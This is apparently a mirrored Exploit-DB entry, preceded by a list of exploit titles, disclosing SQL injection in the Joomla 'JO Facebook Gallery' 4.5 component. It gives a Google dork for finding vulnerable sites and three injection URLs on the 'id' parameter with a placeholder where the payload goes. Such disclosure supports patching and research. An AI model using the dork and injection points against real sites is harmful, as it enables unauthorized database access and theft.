438afbcaf8
12 new exploits Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion Joomla! Component JooDatabase 3.1.0 - SQL Injection Joomla! Component JO Facebook Gallery 4.5 - SQL Injection Joomla! Component AJAX Search for K2 2.2 - SQL Injection Joomla! Component Community Surveys 4.3 - SQL Injection Joomla! Component Community Polls 4.5.0 - SQL Injection Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting Joomla! Component GPS Tools 4.0.1 - SQL Injection Apple WebKit 10.0.2 - Cross-Origin or Sandboxed IFRAME Pop-up Blocker Bypass Joomla! Component Community Quiz 4.3.5 - SQL Injection Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting memcache-viewer - Cross-Site Scripting
19 lines
856 B
Text
Executable file
19 lines
856 B
Text
Executable file
# # # # #
|
|
# Exploit Title: Joomla! Component JO Facebook Gallery v4.5 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_jofacebookgallery
|
|
# Date: 24.02.2017
|
|
# Vendor Homepage: http://joomcore.com/joomla32/
|
|
# Software Buy: https://extensions.joomla.org/extensions/extension/social-web/social-media/jo-facebook-gallery/
|
|
# Demo: http://demo.joomcore.com/joomla32/
|
|
# Version: 4.5
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=category&id=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=albums&id=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=photo&id=[SQL]
|
|
# # # # #
|